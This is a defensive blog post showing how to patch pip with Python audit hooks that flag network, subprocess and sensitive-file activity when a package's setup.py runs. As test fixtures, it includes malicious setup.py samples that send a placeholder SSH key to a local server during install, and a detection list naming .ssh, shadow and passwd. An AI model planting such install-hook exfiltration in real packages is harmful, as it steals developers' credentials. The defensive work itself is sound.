Several supply chain attacks, notably in the Python and JavaScript ecosystems, exploit install-time hooks to perform malicious activity [1][2]. Install-time hooks allow running arbitrary code before or after package installation. Because such attacks do not require a developer to actually use the package, install-time hooks are an attractive method for attackers. The most common behaviour observed in known supply chain attacks is data exfiltration [1][2]. Common targets include SSH keys, passwords, dotfiles, and environment variables.
A bit about how pip works
Python packages are distributed in two primary formats: wheel (.whl) and source (.tar.gz). Many packages offer both formats, and pip prefers .whl artifacts over .tar.gz unless you specify --no-binary during pip install.
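The preference described above can be sketched as a small helper. This is only an illustration: `artifact_kind` and `preferred` are hypothetical names, and the logic is a simplification that looks at file extensions alone, whereas pip also checks things such as platform compatibility.

```python
from typing import List, Optional


def artifact_kind(filename: str) -> str:
    """Classify a distribution file by its extension (simplified)."""
    name = filename.lower()
    if name.endswith(".whl"):
        return "wheel"
    if name.endswith(".tar.gz"):
        return "sdist"
    return "unknown"


def preferred(filenames: List[str], no_binary: bool = False) -> Optional[str]:
    """Pick a wheel when one exists, unless binaries are disallowed."""
    wheels = [f for f in filenames if artifact_kind(f) == "wheel"]
    sdists = [f for f in filenames if artifact_kind(f) == "sdist"]
    if wheels and not no_binary:
        return wheels[0]
    return sdists[0] if sdists else None
```

With `no_binary=True` the helper falls back to the source archive, which is the case where setup.py gets a chance to run.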
A package contains metadata such as author, version, name, and dependencies. There are two primary ways to declare package metadata: pyproject.toml and setup.py. pip prefers pyproject.toml over setup.py, as pyproject.toml is considered setup.py’s successor.
Poetry, for example, generates both setup.py and pyproject.toml when running poetry build. In this case, pip would prioritize pyproject.toml.
If you’re distributing your package as a wheel, you cannot run install hooks [3]. However, if you’re distributing it as a tarball, you can, provided that you have a setup.py and not a pyproject.toml.
Confusing, right? Don’t worry, just follow along!
Since setup.py is run during building and installation, it permits execution of arbitrary Python code.
There may be legitimate reasons to perform network and/or file system actions during or after installation, but since this is the most common attack vector, let’s explore how we can reduce the attack surface using audit hooks!
Test Drive
Let’s set up an audit hook to capture socket.connect and socket.getaddrinfo:
# vim hook.py
import sys


def hook(event, args):
    if event == "socket.getaddrinfo":
        print("REQUESTING " + event + " " + str(args[0]) + ":" + str(args[1]))
    elif event == "socket.connect":
        print("REQUESTING " + event + " " + str(args[1][0]) + ":" + str(args[1][1]))
    else:
        return
    data = input("y(es) or n(o): ")
    if data != "y":
        sys.exit(1)


sys.addaudithook(hook)
# run http server
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
# vim test.py
import hook
import requests

r = requests.get("http://0.0.0.0:8000")
$ pip install requests
$ python3 test.py
REQUESTING socket.getaddrinfo 0.0.0.0:8000
y(es) or n(o): y
REQUESTING socket.connect 0.0.0.0:8000
y(es) or n(o): y
Your http server should show:
127.0.0.1 - - [15/Jun/2023 14:33:56] "GET / HTTP/1.1" 200 -
Try answering n and notice that the server reports no requests.
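For unattended runs, the same idea can be sketched without a prompt by checking the requested host against an allowlist. This is a minimal sketch under assumptions: `ALLOWED_HOSTS`, `requested_host`, `allowlist_hook` and `install` are hypothetical names, and the policy shown is only an example.

```python
import sys

# Hypothetical policy: hosts the process is allowed to talk to.
ALLOWED_HOSTS = {"127.0.0.1", "localhost"}


def requested_host(event, args):
    """Return the host a socket event targets, or None for other events."""
    if event == "socket.getaddrinfo":
        return str(args[0])
    if event == "socket.connect" and isinstance(args[1], tuple):
        return str(args[1][0])
    return None


def allowlist_hook(event, args):
    """Abort socket events that target a host outside the allowlist."""
    host = requested_host(event, args)
    if host is not None and host not in ALLOWED_HOSTS:
        # An exception raised by an audit hook aborts the triggering operation.
        raise PermissionError(f"blocked {event} to {host}")


def install():
    """Register the hook. Audit hooks cannot be removed once added."""
    sys.addaudithook(allowlist_hook)
```

Calling `install()` at the top of a script would then play the role that `import hook` plays in test.py.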
Great! Now let’s introduce this hook into pip.
We need to insert the audit hook before we run the package’s setup.py. We also need to modify the audit hook slightly, as setup.py is run as a subprocess.
# pip/_internal/utils/setuptools_build.py
import sys
import textwrap
from typing import List, Optional, Sequence


AUDIT_HOOK = textwrap.dedent("""'''
def hook(event, args):
    if event == "socket.getaddrinfo":
        sys.stdout.write("REQUESTING " + event + " "+ str(args[0])+":"+str(args[1]) + os.linesep)
        sys.stdout.flush()
    elif event == "socket.connect":
        sys.stdout.write("REQUESTING " + event + " "+ str(args[1][0])+":"+str(args[1][1]) + os.linesep)
        sys.stdout.flush()
    # TODO: filter anything in venv
    # we can filter for anything from here
    # https://peps.python.org/pep-0578/#suggested-audit-hook-locations
    else:
        return
    data = input()
    if data != "y":
        sys.exit(1)

sys.addaudithook(hook)
'''""")
# Shim to wrap setup.py invocation with setuptools
# Note that __file__ is handled via two {!r} *and* %r, to ensure that paths on
# Windows are correctly handled (it should be "C:\\Users" not "C:\Users").
_SETUPTOOLS_SHIM = textwrap.dedent(
    """
    exec(compile('''
    # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py
    #
    # - It imports setuptools before invoking setup.py, to enable projects that directly
    #   import from `distutils.core` to work with newer packaging standards.
    # - It provides a clear error message when setuptools is not installed.
    # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so
    #   setuptools doesn't think the script is `-c`. This avoids the following warning:
    #     manifest_maker: standard file '-c' not found".
    # - It generates a shim setup.py, for handling setup.cfg-only projects.
    import os, sys, tokenize
    try:
        import setuptools
    except ImportError as error:
        print(
            "ERROR: Can not execute `setup.py` since setuptools is not available in "
            "the build environment.",
            file=sys.stderr,
        )
        sys.exit(1)

    __file__ = %r
    sys.argv[0] = __file__

    if os.path.exists(__file__):
        filename = __file__
        with tokenize.open(__file__) as f:
            setup_py_code = f.read()
    else:
        filename = "<auto-generated setuptools caller>"
        setup_py_code = "from setuptools import setup; setup()"
    # setup audit hooks here
    %s
    exec(compile(setup_py_code, filename, "exec"))
    ''' % ({!r}, {}), "<pip-setuptools-caller>", "exec"))
    """
).rstrip()


def make_setuptools_shim_args(
    setup_py_path: str,
    global_options: Optional[Sequence[str]] = None,
    no_user_config: bool = False,
    unbuffered_output: bool = False,
) -> List[str]:
    """
    Get setuptools command arguments with shim wrapped setup file invocation.

    :param setup_py_path: The path to setup.py to be wrapped.
    :param global_options: Additional global options.
    :param no_user_config: If True, disables personal user configuration.
    :param unbuffered_output: If True, adds the unbuffered switch to the
     argument list.
    """
    args = [sys.executable]
    if unbuffered_output:
        args += ["-u"]
    args += ["-c", _SETUPTOOLS_SHIM.format(setup_py_path, AUDIT_HOOK)]
    if global_options:
        args += global_options
    if no_user_config:
        args += ["--no-user-cfg"]
    return args


def make_setuptools_bdist_wheel_args(
    setup_py_path: str,
    global_options: Sequence[str],
    build_options: Sequence[str],
    destination_dir: str,
) -> List[str]:
    # NOTE: Eventually, we'd want to also -S to the flags here, when we're
    # isolating. Currently, it breaks Python in virtualenvs, because it
    # relies on site.py to find parts of the standard library outside the
    # virtualenv.
    args = make_setuptools_shim_args(
        setup_py_path, global_options=global_options, unbuffered_output=True
    )
    args += ["bdist_wheel", "-d", destination_dir]
    args += build_options
    return args


def make_setuptools_clean_args(
    setup_py_path: str,
    global_options: Sequence[str],
) -> List[str]:
    args = make_setuptools_shim_args(
        setup_py_path, global_options=global_options, unbuffered_output=True
    )
    args += ["clean", "--all"]
    return args


def make_setuptools_develop_args(
    setup_py_path: str,
    *,
    global_options: Sequence[str],
    no_user_config: bool,
    prefix: Optional[str],
    home: Optional[str],
    use_user_site: bool,
) -> List[str]:
    assert not (use_user_site and prefix)

    args = make_setuptools_shim_args(
        setup_py_path,
        global_options=global_options,
        no_user_config=no_user_config,
    )

    args += ["develop", "--no-deps"]

    if prefix:
        args += ["--prefix", prefix]
    if home is not None:
        args += ["--install-dir", home]

    if use_user_site:
        args += ["--user", "--prefix="]

    return args


def make_setuptools_egg_info_args(
    setup_py_path: str,
    egg_info_dir: Optional[str],
    no_user_config: bool,
) -> List[str]:
    args = make_setuptools_shim_args(setup_py_path, no_user_config=no_user_config)

    args += ["egg_info"]

    if egg_info_dir:
        args += ["--egg-base", egg_info_dir]

    return args
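Stripped of the pip specifics, the wrapping technique above amounts to prepending hook code to whatever the child interpreter is asked to run. The following is a minimal, non-interactive sketch of that idea: `PRELUDE` and `run_with_hook` are hypothetical names, the exit code 3 is an arbitrary choice, and the child simply exits instead of asking for confirmation.

```python
import subprocess
import sys

# Code placed in front of the untrusted script; it runs first in the child.
PRELUDE = '''
import sys

def _hook(event, args):
    if event in ("socket.getaddrinfo", "socket.connect"):
        print("blocked", event, file=sys.stderr)
        sys.exit(3)

sys.addaudithook(_hook)
'''


def run_with_hook(code: str) -> subprocess.CompletedProcess:
    """Run `code` in a fresh interpreter with the audit hook already active."""
    return subprocess.run(
        [sys.executable, "-c", PRELUDE + "\n" + code],
        capture_output=True,
        text=True,
        timeout=30,
    )
```

Because the hook is registered before the first line of the wrapped code executes, the wrapped code gets no window in which to open a socket unobserved.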
Since this code is called in a subprocess, we need to relay the user input (either y or n) from the main process to the subprocess.
# pip/_internal/utils/subprocess.py
import logging
import os
import shlex
import subprocess
from typing import (
    TYPE_CHECKING,
    Any,
    Callable,
    Iterable,
    List,
    Mapping,
    Optional,
    Union,
)

from pip._vendor.rich.markup import escape

from pip._internal.cli.spinners import SpinnerInterface, open_spinner
from pip._internal.exceptions import InstallationSubprocessError
from pip._internal.utils.logging import VERBOSE, subprocess_logger
from pip._internal.utils.misc import HiddenText

if TYPE_CHECKING:
    # Literal was introduced in Python 3.8.
    #
    # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.
    from typing import Literal

CommandArgs = List[Union[str, HiddenText]]


def make_command(*args: Union[str, HiddenText, CommandArgs]) -> CommandArgs:
    """
    Create a CommandArgs object.
    """
    command_args: CommandArgs = []
    for arg in args:
        # Check for list instead of CommandArgs since CommandArgs is
        # only known during type-checking.
        if isinstance(arg, list):
            command_args.extend(arg)
        else:
            # Otherwise, arg is str or HiddenText.
            command_args.append(arg)

    return command_args


def format_command_args(args: Union[List[str], CommandArgs]) -> str:
    """
    Format command arguments for display.
    """
    # For HiddenText arguments, display the redacted form by calling str().
    # Also, we don't apply str() to arguments that aren't HiddenText since
    # this can trigger a UnicodeDecodeError in Python 2 if the argument
    # has type unicode and includes a non-ascii character. (The type
    # checker doesn't ensure the annotations are correct in all cases.)
    return " ".join(
        shlex.quote(str(arg)) if isinstance(arg, HiddenText) else shlex.quote(arg)
        for arg in args
    )


def reveal_command_args(args: Union[List[str], CommandArgs]) -> List[str]:
    """
    Return the arguments in their raw, unredacted form.
    """
    return [arg.secret if isinstance(arg, HiddenText) else arg for arg in args]


def call_subprocess(
    cmd: Union[List[str], CommandArgs],
    show_stdout: bool = False,
    cwd: Optional[str] = None,
    on_returncode: 'Literal["raise", "warn", "ignore"]' = "raise",
    extra_ok_returncodes: Optional[Iterable[int]] = None,
    extra_environ: Optional[Mapping[str, Any]] = None,
    unset_environ: Optional[Iterable[str]] = None,
    spinner: Optional[SpinnerInterface] = None,
    log_failed_cmd: Optional[bool] = True,
    stdout_only: Optional[bool] = False,
    *,
    command_desc: str,
) -> str:
    """
    Args:
      show_stdout: if true, use INFO to log the subprocess's stderr and
        stdout streams. Otherwise, use DEBUG. Defaults to False.
      extra_ok_returncodes: an iterable of integer return codes that are
        acceptable, in addition to 0. Defaults to None, which means [].
      unset_environ: an iterable of environment variable names to unset
        prior to calling subprocess.Popen().
      log_failed_cmd: if false, failed commands are not logged, only raised.
      stdout_only: if true, return only stdout, else return both. When true,
        logging of both stdout and stderr occurs when the subprocess has
        terminated, else logging occurs as subprocess output is produced.
    """
    if extra_ok_returncodes is None:
        extra_ok_returncodes = []
    if unset_environ is None:
        unset_environ = []
    # Most places in pip use show_stdout=False. What this means is--
    #
    # - We connect the child's output (combined stderr and stdout) to a
    #   single pipe, which we read.
    # - We log this output to stderr at DEBUG level as it is received.
    # - If DEBUG logging isn't enabled (e.g. if --verbose logging wasn't
    #   requested), then we show a spinner so the user can still see the
    #   subprocess is in progress.
    # - If the subprocess exits with an error, we log the output to stderr
    #   at ERROR level if it hasn't already been displayed to the console
    #   (e.g. if --verbose logging wasn't enabled). This way we don't log
    #   the output to the console twice.
    #
    # If show_stdout=True, then the above is still done, but with DEBUG
    # replaced by INFO.
    if show_stdout:
        # Then log the subprocess output at INFO level.
        log_subprocess: Callable[..., None] = subprocess_logger.info
        used_level = logging.INFO
    else:
        # Then log the subprocess output using VERBOSE. This also ensures
        # it will be logged to the log file (aka user_log), if enabled.
        log_subprocess = subprocess_logger.verbose
        used_level = VERBOSE

    # Whether the subprocess will be visible in the console.
    showing_subprocess = subprocess_logger.getEffectiveLevel() <= used_level

    # Only use the spinner if we're not showing the subprocess output
    # and we have a spinner.
    use_spinner = not showing_subprocess and spinner is not None

    log_subprocess("Running command %s", command_desc)
    env = os.environ.copy()
    if extra_environ:
        env.update(extra_environ)
    for name in unset_environ:
        env.pop(name, None)
    try:
        proc = subprocess.Popen(
            # Convert HiddenText objects to the underlying str.
            reveal_command_args(cmd),
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT if not stdout_only else subprocess.PIPE,
            cwd=cwd,
            env=env,
            errors="backslashreplace",
        )
    except Exception as exc:
        if log_failed_cmd:
            subprocess_logger.critical(
                "Error %s while executing command %s",
                exc,
                command_desc,
            )
        raise
    all_output = []
    if not stdout_only:
        assert proc.stdout
        assert proc.stdin
        # In this mode, stdout and stderr are in the same pipe.
        while True:
            line: str = proc.stdout.readline()
            if not line:
                break
            if 'REQUESTING' in line:
                line_without_newline = line.replace('\n', '')
                proc.stdout.flush()
                data = input(f'Package is {line_without_newline}. (y)es or (n)o\n')
                proc.stdin.write(data+'\n')
                proc.stdin.flush()
            else:
                # Show the line immediately.
                log_subprocess(line)
            line = line.rstrip()
            all_output.append(line + "\n")

        try:
            proc.wait()
        finally:
            if proc.stdout:
                proc.stdout.close()
            proc.stdin.close()
        output = "".join(all_output)
    else:
        # In this mode, stdout and stderr are in different pipes.
        # We must use communicate() which is the only safe way to read both.
        out, err = proc.communicate()
        # log line by line to preserve pip log indenting
        for out_line in out.splitlines():
            log_subprocess(out_line)
        all_output.append(out)
        for err_line in err.splitlines():
            log_subprocess(err_line)
        all_output.append(err)
        output = out

    proc_had_error = proc.returncode and proc.returncode not in extra_ok_returncodes
    if use_spinner:
        assert spinner
        if proc_had_error:
            spinner.finish("error")
        else:
            spinner.finish("done")
    if proc_had_error:
        if on_returncode == "raise":
            error = InstallationSubprocessError(
                command_description=command_desc,
                exit_code=proc.returncode,
                output_lines=all_output if not showing_subprocess else None,
            )
            if log_failed_cmd:
                subprocess_logger.error("[present-rich] %s", error)
                subprocess_logger.verbose(
                    "[bold magenta]full command[/]: [blue]%s[/]",
                    escape(format_command_args(cmd)),
                    extra={"markup": True},
                )
                subprocess_logger.verbose(
                    "[bold magenta]cwd[/]: %s",
                    escape(cwd or "[inherit]"),
                    extra={"markup": True},
                )

            raise error
        elif on_returncode == "warn":
            subprocess_logger.warning(
                'Command "%s" had error code %s in %s',
                command_desc,
                proc.returncode,
                cwd,
            )
        elif on_returncode == "ignore":
            pass
        else:
            raise ValueError(f"Invalid value: on_returncode={on_returncode!r}")
    return output


def runner_with_spinner_message(message: str) -> Callable[..., None]:
    """Provide a subprocess_runner that shows a spinner message.

    Intended for use with for BuildBackendHookCaller. Thus, the runner has
    an API that matches what's expected by BuildBackendHookCaller.subprocess_runner.
    """

    def runner(
        cmd: List[str],
        cwd: Optional[str] = None,
        extra_environ: Optional[Mapping[str, Any]] = None,
    ) -> None:
        with open_spinner(message) as spinner:
            call_subprocess(
                cmd,
                command_desc=message,
                cwd=cwd,
                extra_environ=extra_environ,
                spinner=spinner,
            )

    return runner
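The relay itself is easier to see outside of pip. In the sketch below, a parent reads the child's output line by line and answers every REQUESTING line over the child's stdin. The names `CHILD`, `relay` and `decide` are hypothetical, the child is a stand-in for a hooked setup.py, and a callback replaces the interactive input() call so the example can run unattended.

```python
import subprocess
import sys

# Stand-in for a hooked setup.py: announce a request, then wait for a verdict.
CHILD = r'''
import sys
sys.stdout.write("REQUESTING socket.connect example.invalid:80\n")
sys.stdout.flush()
answer = sys.stdin.readline().strip()
sys.stdout.write("child got " + answer + "\n")
sys.exit(0 if answer == "y" else 1)
'''


def relay(cmd, decide):
    """Run cmd, answer each REQUESTING line via decide(), return (code, lines)."""
    proc = subprocess.Popen(
        cmd,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
    )
    assert proc.stdin and proc.stdout
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break  # the child closed its output
        if line.startswith("REQUESTING"):
            answer = "y" if decide(line.strip()) else "n"
            proc.stdin.write(answer + "\n")
            proc.stdin.flush()  # the child is blocked until this arrives
        else:
            lines.append(line.rstrip("\n"))
    proc.stdin.close()
    returncode = proc.wait()
    proc.stdout.close()
    return returncode, lines
```

Both sides have to flush after writing; otherwise the parent and child can end up waiting on each other's buffered output.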
Testing our hook:
Let’s create a fake package to test it out:
$ mkdir test
$ vim test/setup.py
# test/setup.py
from setuptools import setup
import requests # you can use socket too
requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')
setup()
$ tar -czf test.tar.gz test
$ pip install test.tar.gz
Processing ./test.tar.gz
Preparing metadata (setup.py) ...
Package is REQUESTING socket.getaddrinfo 0.0.0.0:8000. (y)es or (n)o
Another method:
$ vim test/setup.py
# test/setup.py
from setuptools import setup
from setuptools.command.install import install
from setuptools.command.develop import develop
import requests  # you can use socket too


class AfterInstall(install):
    def run(self):
        install.run(self)
        requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')


class AfterDevelop(develop):
    def run(self):
        develop.run(self)
        requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')


setup(cmdclass={
    'install': AfterInstall,
    'develop': AfterDevelop})
$ tar -czf test.tar.gz test
$ pip install test.tar.gz
Processing ./test.tar.gz
Preparing metadata (setup.py) ...
done
Building wheels for collected packages: UNKNOWN
Building wheel for UNKNOWN (setup.py)
... Package is REQUESTING socket.getaddrinfo 0.0.0.0:8000. (y)es or (n)o
Yes! It works!
Additional checks:
def hook(event, args):
    if event == "socket.getaddrinfo":
        sys.stdout.write("REQUESTING " + event + " " + str(args[0]) + ":" + str(args[1]) + os.linesep)
        sys.stdout.flush()
    elif event == "socket.connect":
        sys.stdout.write("REQUESTING " + event + " " + str(args[1][0]) + ":" + str(args[1][1]) + os.linesep)
        sys.stdout.flush()
    elif event == "open":
        arg = str(args[0])
        if ".ssh" in arg or "shadow" in arg or "passwd" in arg or ".config" in arg or ".env" in arg:
            sys.stdout.write("REQUESTING " + event + " " + arg + os.linesep)
            sys.stdout.flush()
        else:
            return
    elif event == "os.system":
        # On POSIX the command arrives as bytes.
        sys.stdout.write("REQUESTING: " + event + " " + args[0].decode("utf-8") + os.linesep)
        sys.stdout.flush()
    elif event == "subprocess.Popen":
        # subprocess.call() and subprocess.run() both go through Popen, which
        # raises "subprocess.Popen" with (executable, args, cwd, env).
        sys.stdout.write("REQUESTING: " + event + " " + str(args[1]) + os.linesep)
        sys.stdout.flush()
    elif event == "eval":
        # Note: CPython reports eval() and exec() under the "exec" event, which
        # also fires on imports, so this branch may need a different check.
        sys.stdout.write("REQUESTING: execution of arbitrary code" + os.linesep)
        sys.stdout.flush()
    else:
        return
    data = input()
    if data != "y":
        sys.exit(1)
The open event is filtered by path, as pip opens various files when building and installing.
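The substring test in the hook also matches unrelated paths (a file named shadowing.py contains "shadow", for example). One possible refinement, sketched here under assumptions, compares whole path components instead. `SENSITIVE_NAMES` and `is_sensitive` are hypothetical names, and the set simply mirrors the strings used in the hook.

```python
import os
from pathlib import PurePosixPath

# Mirrors the substrings checked in the hook; adjust to your own policy.
SENSITIVE_NAMES = {".ssh", ".config", ".env", "shadow", "passwd"}


def is_sensitive(path) -> bool:
    """Return True if any component of path is a known sensitive name."""
    if isinstance(path, int):
        return False  # open() may also be given a file descriptor
    try:
        text = os.fsdecode(path)  # accepts str, bytes and os.PathLike
    except TypeError:
        return False
    parts = PurePosixPath(text.replace("\\", "/")).parts
    return any(part in SENSITIVE_NAMES for part in parts)
```

In the hook, the `open` branch could then call `is_sensitive(args[0])` in place of the chain of `in` checks.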
Conclusion:
Audit hooks are NOT foolproof and can be bypassed by an advanced adversary. See the PEP for more info. Despite that, this implementation provides a simple and effective defence against the abuse of install time hooks.
See the full implementation
Use it:
$ python3 -m venv venv
$ cd venv/lib/python3.<yourversion>/site-packages/
$ mv pip old_pip
$ wget https://github.com/R9295/pip/archive/refs/heads/main.zip
$ unzip main.zip
$ mv pip-main pip
$ cd pip
$ mv src/pip/* .
$ cd /to/our/test/package
$ pip install test.tar.gz
# it should work!